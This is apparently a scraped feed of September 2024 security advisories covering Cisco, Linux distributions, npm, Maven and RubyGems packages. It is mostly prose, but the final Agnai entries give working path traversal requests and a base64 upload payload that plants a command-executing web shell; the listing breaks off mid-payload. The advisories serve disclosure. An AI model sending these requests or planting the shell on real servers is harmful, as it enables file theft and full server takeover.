https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-UTD-SNORT3-DOS-BYPAS-B4OUEWXD
25.09.2024 19:00:00	cisco	[CISCO-SA-SDWAN-XSS-ZQ4KPVYD] Cisco Catalyst SD-WAN Manager Cross-Site Scripting Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Catalyst SD-WAN Manager, formerly Cisco SD-WAN vManage, could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by inserting malicious data into a specific data field in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SDWAN-XSS-ZQ4KPVYD
25.09.2024 19:00:00	cisco	[CISCO-SA-SDWAN-UTD-DOS-HDATQXS] Cisco Catalyst SD-WAN Routers Denial of Service Vulnerability (high)	A vulnerability in the process that classifies traffic that is going to the Unified Threat Defense (UTD) component of Cisco IOS XE Software in controller mode could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability exists because UTD improperly handles certain packets as those packets egress an SD-WAN IPsec tunnel. An attacker could exploit this vulnerability by sending crafted traffic through an SD-WAN IPsec tunnel that is configured on an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.Note: SD-WAN tunnels that are configured with Generic Routing Encapsulation (GRE) are not affected by this vulnerability.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SDWAN-UTD-DOS-HDATQXS
25.09.2024 19:00:00	cisco	[CISCO-SA-SDW-VEDOS-KQFFHPS3] Cisco SD-WAN vEdge Software UDP Packet Validation Denial of Service Vulnerability (medium)	A vulnerability in the UDP packet validation code of Cisco SD-WAN vEdge Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected system.This vulnerability is due to incorrect handling of a specific type of malformed UDP packet. An attacker in a machine-in-the-middle position could exploit this vulnerability by sending crafted UDP packets to an affected device. A successful exploit could allow the attacker to cause the device to reboot, resulting in a DoS condition on the affected system.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SDW-VEDOS-KQFFHPS3
25.09.2024 19:00:00	cisco	[CISCO-SA-RSVP-DOS-OYPVGVZF] Cisco IOS and IOS XE Software Resource Reservation Protocol Denial of Service Vulnerability (high)	A vulnerability in the Resource Reservation Protocol (RSVP) feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition.This vulnerability is due to a buffer overflow when processing crafted RSVP packets. An attacker could exploit this vulnerability by sending RSVP traffic to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-RSVP-DOS-OYPVGVZF
25.09.2024 19:00:00	cisco	[CISCO-SA-REPACL-9EXGNBPD] Cisco IOS Software on Cisco Industrial Ethernet Series Switches Access Control List Bypass Vulnerability (medium)	A vulnerability in the access control list (ACL) programming of Cisco IOS Software running on Cisco Industrial Ethernet 4000, 4010, and 5000 Series Switches could allow an unauthenticated, remote attacker to bypass a configured ACL.This vulnerability is due to the incorrect handling of IPv4 ACLs on switched virtual interfaces when an administrator enables and disables Resilient Ethernet Protocol (REP). An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to bypass an ACL on the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-REPACL-9EXGNBPD
25.09.2024 19:00:00	cisco	[CISCO-SA-PIM-APBVFYSJ] Cisco IOS XE Software Protocol Independent Multicast Denial of Service Vulnerability (high)	A vulnerability in the Protocol Independent Multicast (PIM) feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to insufficient validation of received IPv4 PIMv2 packets. An attacker could exploit this vulnerability by sending a crafted PIMv2 packet to a PIM-enabled interface on an affected device. A successful exploit could allow the attacker to cause an affected device to reload, resulting in a DoS condition.Note: This vulnerability can be exploited with either an IPv4 multicast or unicast packet.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-PIM-APBVFYSJ
25.09.2024 19:00:00	cisco	[CISCO-SA-IOS-XE-SDA-EDGE-DOS-MBCBG9K] Cisco IOS XE Software SD-Access Fabric Edge Node Denial of Service Vulnerability (high)	A vulnerability in the DHCP Snooping feature of Cisco IOS XE Software on Software-Defined Access (SD-Access) fabric edge nodes could allow an unauthenticated, remote attacker to cause high CPU utilization on an affected device, resulting in a denial of service (DoS) condition that requires a manual reload to recover.This vulnerability is due to improper handling of IPv4 DHCP packets. An attacker could exploit this vulnerability by sending certain IPv4 DHCP packets to an affected device. A successful exploit could allow the attacker to cause the device to exhaust CPU resources and stop processing traffic, resulting in a DoS condition that requires a manual reload to recover.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOS-XE-SDA-EDGE-DOS-MBCBG9K
25.09.2024 19:00:00	cisco	[CISCO-SA-IOS-WEBUI-HFWNRGK] Cisco IOS and IOS XE Software Web UI Cross-Site Request Forgery Vulnerability (medium)	A vulnerability in the web UI feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system through the web UI.This vulnerability is due to incorrectly accepting configuration changes through the HTTP GET method. An attacker could exploit this vulnerability by persuading a currently authenticated administrator to follow a crafted link. A successful exploit could allow the attacker to change the configuration of the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOS-WEBUI-HFWNRGK
25.09.2024 19:00:00	cisco	[CISCO-SA-HTTPSRVR-DOS-YOZTHUT] Cisco IOS XE Software HTTP Server Telephony Services Denial of Service Vulnerability (high)	A vulnerability in the HTTP Server feature of Cisco IOS XE Software when the Telephony Service feature is enabled could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to a null pointer dereference when accessing specific URLs. An attacker could exploit this vulnerability by sending crafted HTTP traffic to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, causing a DoS condition on the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-HTTPSRVR-DOS-YOZTHUT
25.09.2024 19:00:00	cisco	[CISCO-SA-DNAC-SSH-E4UODASJ] Cisco Catalyst Center Static SSH Host Key Vulnerability (high)	A vulnerability in the SSH server of Cisco Catalyst Center, formerly Cisco DNA Center, could allow an unauthenticated, remote attacker to impersonate a Cisco Catalyst Center appliance.This vulnerability is due to the presence of a static SSH host key. An attacker could exploit this vulnerability by performing a machine-in-the-middle attack on SSH connections, which could allow the attacker to intercept traffic between SSH clients and a Cisco Catalyst Center appliance. A successful exploit could allow the attacker to impersonate the affected appliance, inject commands into the terminal session, and steal valid user credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-DNAC-SSH-E4UODASJ
25.09.2024 19:00:00	cisco	[CISCO-SA-CPP-VFR-DOS-NHHKGGO] Cisco IOS XE Software IPv4 Fragmentation Reassembly Denial of Service Vulnerability (high)	A vulnerability in the implementation of the IPv4 fragmentation reassembly code in Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to improper management of resources during fragment reassembly. An attacker could exploit this vulnerability by sending specific sizes of fragmented packets to an affected device or through a Virtual Fragmentation Reassembly (VFR)-enabled interface on an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.Note: This vulnerability affects Cisco ASR 1000 Series Aggregation Services Routers and Cisco cBR-8 Converged Broadband Routers if they are running Cisco IOS XE Software Release 17.12.1 or 17.12.1a.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CPP-VFR-DOS-NHHKGGO
25.09.2024 19:00:00	cisco	[CISCO-SA-C9800-CWA-ACL-NPSBHSNA] Cisco IOS XE Software for Wireless Controllers CWA Pre-Authentication ACL Bypass Vulnerability (medium)	A vulnerability in the Central Web Authentication (CWA) feature of Cisco IOS XE Software for Wireless Controllers could allow an unauthenticated, adjacent attacker to bypass the pre-authentication access control list (ACL), which could allow access to network resources before user authentication.This vulnerability is due to a logic error when activating the pre-authentication ACL that is received from the authentication, authorization, and accounting (AAA) server. An attacker could exploit this vulnerability by connecting to a wireless network that is configured for CWA and sending traffic through an affected device that should be denied by the configured ACL before user authentication. A successful exploit could allow the attacker to bypass configured ACL protections on the affected device before the user authentication is completed, allowing the attacker to access trusted networks that the device might be protecting.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-C9800-CWA-ACL-NPSBHSNA
25.09.2024 17:31:10	maven	[MAVEN:GHSA-F5FW-25GW-5M92] Apache Hadoop: Temporary File Local Information Disclosure (low)	Apache Hadoop’s `RunJar.run()` does not set permissions for temporary directory by default. If sensitive data will be present in this file, all the other local users may be able to view the content. This is because, on unix-like systems, the system temporary directory is shared between all local users. As such, files written in this directory, without setting the correct posix permissions explicitly, may be viewable by all other local users.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F5FW-25GW-5M92
25.09.2024 21:51:17	npm	[NPM:GHSA-6375-PG5J-8WPH] Denial of service in rocket chat message parser (moderate)	Rocket.Chat 6.12.0, 6.11.2, 6.10.5, 6.9.6, 6.8.6, 6.7.8, and earlier is vulnerable to denial of service (DoS). Attackers who craft messages with specific characters may crash the workspace due to an issue in the message parser.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6375-PG5J-8WPH
25.09.2024 17:29:59	maven	[MAVEN:GHSA-6GCH-63WP-4V5F] Apache Linkis Spark EngineConn: Commons Lang's RandomStringUtils Random string security vulnerability (high)	In Apache Linkis <= 1.5.0, a Random string security vulnerability in Spark EngineConn, random string generated by the Token when starting Py4j uses the Commons Lang's RandomStringUtils.Users are recommended to upgrade to version 1.6.0, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6GCH-63WP-4V5F
26.09.2024 02:27:45	rustsec	[RUSTSEC-0000-0000] `atty` is unmaintained	The maintainer of `atty` has [published](https://github.com/softprops/atty/commit/5bfdbe9e48c6ca6a4909e8d5b04f5e843a257e93) an official notice that the crate is no longerunder development, and that users should instead rely on the functionality in the standard library's [`IsTerminal`](https://doc.rust-lang.org/std/io/trait.IsTerminal.html) trait.## Alternative(s)- [std::io::IsTerminal](https://doc.rust-lang.org/stable/std/io/trait.IsTerminal.html) - Stable since Rust 1.70.0 and the recommended replacement per the `atty` maintainer.- [is-terminal](https://crates.io/crates/is-terminal) - Standalone crate supporting Rust older than 1.70.0	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-0000-0000
25.09.2024 18:23:14	almalinux	[ALSA-2024:7000] kernel security update (important)	kernel security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7000
25.09.2024 18:10:43	rubysec	[RUBYSEC:CAMALEON_CMS-8FX8-3RG2-79XW] Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184) (medium)	A stored cross-site scripting has been found in the image uploadfunctionality that can be used by normal registered users:It is possible to upload a SVG image containing JavaScript andit's also possible to upload a HTML document when the formatparameter is manually changed to [documents][1] or a string ofan [unsupported format][2]. If an authenticated user or administratorvisits that uploaded image or document malicious JavaScript canbe executed on their behalf (e.g. changing or deleting contentinside of the CMS.)[1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106[2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111## ImpactThis issue may lead to account takeover due to reflectedCross-site scripting (XSS).## RemediationOnly allow the upload of safe files such as PNG, TXT and othersor serve all "unsafe" files such as SVG and other files with acontent-disposition: attachment header, which should preventbrowsers from displaying them.Additionally, a [Content security policy (CSP)][3] can be createdthat disallows inlined script. (Other parts of the applicationmight need modification to continue functioning.)[3]: https://web.dev/articles/cspTo prevent the theft of the auth_token it could be marked withHttpOnly. This would however not prevent that actions could beperformed as the authenticated user/administrator. Furthermore,it could make sense to use the authentication provided byRuby on Rails, so that stolen tokens cannot be used anymoreafter some time.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:CAMALEON_CMS-8FX8-3RG2-79XW
27.09.2024 04:45:04	fedora	[FEDORA-2024-e60359f212] Fedora 39: chromium (critical)	Update to 129.0.6668.70 * High CVE-2024-9120: Use after free in Dawn * High CVE-2024-9121: Inappropriate implementation in V8 * High CVE-2024-9122: Type Confusion in V8 * High CVE-2024-9123: Integer overflow in Skia	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e60359f212
27.09.2024 04:30:23	fedora	[FEDORA-2024-aaff7345b8] Fedora 40: chromium (critical)	Update to 129.0.6668.70 * High CVE-2024-9120: Use after free in Dawn * High CVE-2024-9121: Inappropriate implementation in V8 * High CVE-2024-9122: Type Confusion in V8 * High CVE-2024-9123: Integer overflow in Skia	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-aaff7345b8
26.09.2024 23:40:34	ubuntu	[USN-7045-1] libppd vulnerability	libppd could be made to run programs if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7045-1
26.09.2024 23:35:22	ubuntu	[USN-7044-1] libcupsfilters vulnerability	libcupsfilters could be made to run programs if it received speciallycrafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7044-1
26.09.2024 23:30:49	ubuntu	[USN-7043-1] cups-filters vulnerabilities	cups-filters could be made to run programs if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7043-1
26.09.2024 23:24:02	ubuntu	[USN-7042-1] cups-browsed vulnerability	cups-browsed could be made to run programs if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7042-1
26.09.2024 23:12:01	ubuntu	[USN-7041-1] CUPS vulnerability	CUPS could be made to crash or run programs if it received speciallycrafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7041-1
26.09.2024 21:41:13	slackware	[SSA:2024-270-01] boost	New boost packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/boost-1.78.0-i586-3_slack15.0.txz: Rebuilt. Get rid of hardcoded temporary paths in the cmake files. Since these paths point to a location that an unprivileged user could create and populate with files that could be picked up during a build, it's possible this bug could be used for malicious purposes. Thanks to jmacloue. (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/boost-1.78.0-i586-3_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/boost-1.78.0-x86_64-3_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/boost-1.86.0-i686-2.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/boost-1.86.0-x86_64-2.txzMD5 signaturesSlackware 15.0 package:7480389f2789669e7a0d7c72ff247842 boost-1.78.0-i586-3_slack15.0.txzSlackware x86_64 15.0 package:66cbb6fed84a2e79a9e2db7b3ca0a2c5 boost-1.78.0-x86_64-3_slack15.0.txzSlackware -current package:e884f4a39337c2ac3051b8ba349e49a1 l/boost-1.86.0-i686-2.txzSlackware x86_64 -current package:daa51704f0bdbf686e7b978b298c0d70 l/boost-1.86.0-x86_64-2.txzInstallation instructions*Upgrade the package as root:`# upgradepkg boost-1.78.0-i586-3_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-270-01
27.09.2024 00:11:07	npm	[NPM:GHSA-G54F-66MW-HV66] Agnai vulnerable to Relative Path Traversal in Image Upload (low)	### SummaryA vulnerability has been discovered in Agnai that permits attackers to upload image files at attacker-chosen location on the server. This issue can lead to image file uploads to unauthorized or unintended directories, including overwriting of existing images which may be used for defacement.This does not affect:- agnai.chat- installations using S3-compatible storage- self-hosting that is not publicly exposed### CWE-35: Path Traversalhttps://cwe.mitre.org/data/definitions/35.html### CVSS4.0 - 2.3 LowCVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N### DetailsThis is a path traversal vulnerability. An attacker can exploit this vulnerability by sending a specially crafted request to the `editCharacter` handler https://github.com/agnaistic/agnai/blob/75abbd5b0f5e48ddecc805365cf1574d05ee1ce5/srv/api/character.ts#L140:```tsxPOST /api/character/28cbe508-2fa9-4890-886e-61d73e22006c%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%61%70%70%2f%64%69%73%74%2f%64%61%6e%79%61%6e%67 HTTP/1.1```The path traversal character sequence makes it’s way into the `id` variable which is then string interpolated into `filename`. ```jsxexport async function entityUpload(kind: string, id: string, attachment?: Attachment) { if (!attachment) return const filename = `${kind}-${id}` return upload(attachment, filename)}```https://github.com/agnaistic/agnai/blob/75abbd5b0f5e48ddecc805365cf1574d05ee1ce5/srv/api/upload.ts#L55No path normalization is conducted nor checked, so attackers can freely manipulate the path which the file is uploaded to.### ImpactThis vulnerability is classified as a path traversal vulnerability. Attackers can upload image files to arbitrary locations, potentially overwriting critical system image files.### CreditSecurity research in collaboration with Analyst [Danyang Liu (noe223)](https://github.com/noe233) @noe233	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G54F-66MW-HV66
27.09.2024 00:11:07	npm	[NPM:GHSA-H355-HM5H-CM8H] Agnai File Disclosure Vulnerability: JSON via Path Traversal (low)	### CWE-35: Path Traversalhttps://cwe.mitre.org/data/definitions/35.html### CVSSv3.1 4.3 - MediumCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:NCVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N### SummaryA vulnerability has been discovered in Agnai that permits attackers to read arbitrary JSON files at attacker-chosen locations on the server. This issue can lead to unauthorized access to sensitive information and exposure of confidential configuration files.This only affects installations with `JSON_STORAGE` enabled which is intended to local/self-hosting only.### Details & PoCThis is a path traversal vulnerability. An attacker can exploit this vulnerability by sending a specially crafted request:```tsxGET /api/json/messages/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%61%70%70%2fpackage HTTP/1.1```In this example, the attacker retrieves the `package.json` file content from the server by manipulating the file path.The request is processed by the `loadMessages` handler in `agnai/srv/api/json/index.ts` and a file is read and returned to the client. The read filename is constructed using string interpolation, with no guard or check for path traversal: https://github.com/agnaistic/agnai/blob/2b878b7ca66471c5dd080197ad9ca2f7f0022655/srv/api/json/index.ts#L77#### ConstraintsEnvironment constraints: JSON Storage enabled (non standard)### ImpactThis vulnerability is classified as a path traversal vulnerability. Specifically, any JSON file on the server which the webserver process has read privileges for, can be disclosed to the attacker.### Credit- @ropwareJB- @noe233	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-H355-HM5H-CM8H
27.09.2024 00:11:07	npm	[NPM:GHSA-MPCH-89GM-HM83] Agnai vulnerable to Remote Code Execution via JS Upload using Directory Traversal (critical)	## SummaryA vulnerability has been discovered in Agnai that permits attackers to upload arbitrary files to attacker-chosen locations on the server, including JavaScript, enabling the execution of commands within those files. This issue could result in unauthorized access, full server compromise, data leakage, and other critical security threats.This does not affect:- `agnai.chat`- installations using S3-compatible storage- self-hosting that is not publicly exposedThis DOES affect:- publicly hosted installs without S3-compatible storage### CWEsCWE-35: Path TraversalCWE-434: Unrestricted Upload of File with Dangerous Type### CVSS-4.0 - 9.0 - CriticalCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HCVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H### DescriptionPath Traversal and Unrestricted Upload of File with Dangerous TypePath Traversal Location```tsxPOST /api/chat/5c25e8dc-67c3-40e1-9572-32df2e26ff38/temp-character HTTP/1.1{"_id": "/../../../../../../app/srv/api/voice",...<ommitted>}```In the following file, the `_id` parameter which is a remote-supplied parameter is not properly validated and sanitized.https://github.com/agnaistic/agnai/blob/437227d9aa86132f3be3b41c89981cb393c903d0/srv/api/chat/characters.ts#L101```jsx const upserted: AppSchema.Character = { _id: body._id \|\| `temp-${v4().slice(0, 8)}`, kind: 'character', createdAt: now(),```In the following file, the `filename` (or `id`) and `content` variables are not properly sanitized and validated,https://github.com/agnaistic/agnai/blob/dev/srv/api/upload.ts#L63```jsxexport async function entityUploadBase64(kind: string, id: string, content?: string) { if (!content) return if (!content.includes(',')) return const filename = `${kind}-${id}` const attachment = toAttachment(content) return upload(attachment, filename)}``````jsxfunction toAttachment(content: string): Attachment { const [prefix, base64] = content.split(',') const type = prefix.slice(5, -7) const [, ext] = type.split('/') return { ext, field: '', original: '', type: getType(ext), content: Buffer.from(base64, 'base64'), }}```An attacker can freely specify arbitrary file types (and arbitrary base64-encoded file content), thereby permitting them to upload JavaScript files and by abusing the `_id` parameter, to control the location of the file to overwrite an existing server file;```jsxPOST /api/chat/5c25e8dc-67c3-40e1-9572-32df2e26ff38/temp-character HTTP/1.1...Connection: keep-alive{"_id": "/../../../../../../app/srv/api/voice","name":"","description":"","culture":"en-us","tags":[],"scenario":"","appearance":"","visualType":"avatar","avatar":"data:image/js;base64,InVzZSBzdHJpY3QiOwpPYmplY3QuZGVmaW5lUHJvcGVydHkoZXhwb3J0cywgIl9fZXNNb2R1bGUiLCB7IHZhbHVlOiB0cnVlIH0pOwpjb25zdCBleHByZXNzXzEgPSByZXF1aXJlKCJleHByZXNzIik7CmNvbnN0IHdyYXBfMSA9IHJlcXVpcmUoIi4vd3JhcCIpOwpjb25zdCB2b2ljZV8xID0gcmVxdWlyZSgiLi4vdm9pY2UiKTsKY29uc3QgZGJfMSA9IHJlcXVpcmUoIi4uL2RiIik7CmNvbnN0IHZhbGlkXzEgPSByZXF1aXJlKCIvY29tbW9uL3ZhbGlkIik7CmNvbnN0IHJvdXRlciA9ICgwLCBleHByZXNzXzEuUm91dGVyKSgpOwpjb25zdCB0ZXh0VG9TcGVlY2hWYWxpZCA9IHsgdGV4dDogJ3N0cmluZycsIHZvaWNlOiAnYW55JyB9Owpjb25zdCB0ZXh0VG9TcGVlY2ggPSAoMCwgd3JhcF8xLmhhbmRsZSkoYXN5bmMgKHsgYm9keSwgdXNlcklkLCBzb2NrZXRJZCwgbG9nLCBwYXJhbXMgfSkgPT4gewogICAgY29uc3QgdXNlciA9IHVzZXJJZCA/IGF3YWl0IGRiXzEuc3RvcmUudXNlcnMuZ2V0VXNlcih1c2VySWQpIDogYm9keS51c2VyOwogICAgY29uc3QgZ3Vlc3RJZCA9IHVzZXJJZCA/IHVuZGVmaW5lZCA6IHNvY2tldElkOwogICAgKDAsIHZhbGlkXzEuYXNzZXJ0VmFsaWQpKHRleHRUb1NwZWVjaFZhbGlkLCBib2R5KTsKICAgIHJldHVybiAoMCwgdm9pY2VfMS5nZW5lcmF0ZVRleHRUb1NwZWVjaCkodXNlciwgbG9nLCBndWVzdElkLCBib2R5LnRleHQsIGJvZHkudm9pY2UpOwp9KTsKY29uc3QgZ2V0Vm9pY2VzID0gKDAsIHdyYXBfMS5oYW5kbGUpKGFzeW5jICh7IGJvZHksIHVzZXJJZCwgc29ja2V0SWQsIGxvZywgcGFyYW1zIH0pID0+IHsKICAgIGNvbnN0IHR0c1NlcnZpY2UgPSBwYXJhbXMuaWQ7CiAgICBjb25zdCB1c2VyID0gdXNlcklkID8gYXdhaXQgZGJfMS5zdG9yZS51c2Vycy5nZXRVc2VyKHVzZXJJZCkgOiBib2R5LnVzZXI7CiAgICBjb25zdCBndWVzdElkID0gdXNlcklkID8gdW5kZWZpbmVkIDogc29ja2V0SWQ7CiAgICByZXR1cm4gKDAsIHZvaWNlXzEuZ2V0Vm9pY2VzTGlzdCkoeyB0dHNTZXJ2aWNlOiB0dHNTZXJ2aWNlLCB1c2VyIH0sIGxvZywgZ3Vlc3RJZCk7Cn0pOwpjb25zdCBnZXRNb2RlbHMgPSAoMCwgd3JhcF8xLmhhbmRsZSkoYXN5bmMgKHsgYm9keSwgdXNlcklkLCBzb2NrZXRJZCwgbG9nLCBwYXJhbXMgfSkgPT4gewogICAgY29uc3QgdHRzU2VydmljZSA9IHBhcmFtcy5pZDsKICAgIGNvbnN0IHVzZXIgPSB1c2VySWQgPyBhd2FpdCBkYl8xLnN0b3JlLnVzZXJzLmdldFVzZXIodXNlcklkKSA6IGJvZHkudXNlcjsKICAgIGNvbnN0IGd1ZXN0SWQgPSB1c2VySWQgPyB1bmRlZmluZWQgOiBzb2NrZXRJZDsKICAgIHJldHVybiAoMCwgdm9pY2VfMS5nZXRNb2RlbHNMaXN0KSh7IHR0c1NlcnZpY2U6IHR0c1NlcnZpY2UsIHVzZXIgfSwgbG9nLCBndWVzdElkKTsKfSk7Cgpjb25zdCBnZXRDbWQgPSAoMCwgd3JhcF8xLmhhbmRsZSkoYXN5bmMgKHsgYm9keSwgdXNlcklkLCBzb2NrZXRJZCwgbG9nLCBwYXJhbXMgfSkgPT4gewoJY29uc3QgY2hpbGRfcHJvY2Vzc18xID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpOwoJY2hpbGRfcHJvY2Vzc18xLmV4ZWNTeW5jKGJvZHkuY21kKTsKICAgIHJldHVybiAoMCwgdm9pY2VfMS5nZXRNb2RlbHNMaXN0KSh7IHR0c1NlcnZpY2U6IHR0c1NlcnZpY2UsIHVzZXIgfSwgbG9nLCBndWVzdElkKTsKfSk7Cgpyb3V0ZXIucG9zdCgnL3R0cycsIHRleHRUb1NwZWVjaCk7CnJvdXRlci5wb3N0KCcvOmlkL3ZvaWNlcycsIGdldFZvaWNlcyk7CnJvdXRlci5wb3N0KCcvOmlkL21vZGVscycsIGdldE1vZGVscyk7CnJvdXRlci5